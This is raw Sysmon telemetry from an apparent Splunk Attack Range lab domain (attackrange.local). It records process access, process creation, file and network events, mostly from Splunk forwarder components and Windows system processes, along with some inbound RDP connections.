10341000x80000000000000001048076Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.724{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048075Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.724{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048074Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.724{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8882-6151-F079-00000000FC01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048073Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.724{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8882-6151-F079-00000000FC01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048072Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.710{5EBD8912-8882-6151-F079-00000000FC01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048071Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.255{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5591C88A9088A78EA7C41B206E00E54,SHA256=91479745E83FE103ADF5B741F6C2322D7CD95BE07CD12314B4DDCBED564B4D07,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048070Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.240{5EBD8912-8882-6151-EF79-00000000FC01}44566460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048069Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.051{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8882-6151-EF79-00000000FC01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048068Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.051{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048067Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.051{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048066Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.051{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048065Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.051{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048064Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.051{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8882-6151-EF79-00000000FC01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048063Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.051{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8882-6151-EF79-00000000FC01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048062Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.036{5EBD8912-8882-6151-EF79-00000000FC01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001048061Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:51.833{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53138-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000976651Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:53.997{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D4C22BFAB23B1FDE4BF998C5CBBC935A,SHA256=70562D7F797E74E3B376ADB021B24ACAD9BB2B0961C30044FDC7EFAA7199C5F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976655Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:55.357{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD702789B2B882A4F01D999EC4B8C42C,SHA256=3ED91A1A3F2A473DE8091EEFFFA51FEC58B89155D42510AE90B7FA21361902C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976654Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:55.310{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43425B266850FFEFC689BF44350C4ECC,SHA256=0E4F7313BEC6668E0BE986EBC8EAF8AED289A02D60B94FAEC1E0BE7826436D8B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048091Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:55.495{5EBD8912-8883-6151-F179-00000000FC01}52285240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048090Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:55.324{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8883-6151-F179-00000000FC01}5228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048089Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:55.324{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048088Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:55.324{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048087Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:55.324{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048086Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:55.324{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048085Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:55.324{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8883-6151-F179-00000000FC01}5228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048084Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:55.324{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8883-6151-F179-00000000FC01}5228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048083Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:55.310{5EBD8912-8883-6151-F179-00000000FC01}5228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048082Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:55.277{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=993F303AE51E72ADB277CCEC391D4E09,SHA256=98C10DDA5AFAB8985C20DB1383B2C40F2D2E31C767B7FEF037F4D86C0ADD37EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048081Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:55.093{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2419CE2215DFE7FAF1582E18F9309A2,SHA256=62A3D85BEB15D4F6183EC380CB58C9EB252A9114DC2FEAEE22CE366D0CC13754,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976658Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:52.845{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59264-false10.0.1.12-8000- 354300x8000000000000000976657Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:52.468{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-50803-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976656Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:56.325{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54FD74E95481B847B3D8A25EE055319D,SHA256=6A07F66EBECA86C3DE22A78990E8D56189B13840C8ED24D30649A1FAA7BAB57F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048102Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:56.325{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A01334B9D62182A6A2F97E08F909D038,SHA256=91051DEF5E1797B459B46E021503F4A17F74C589D97FB74310AF2E3D90069706,IMPHASH=00000000000000000000000000000000falsetrue 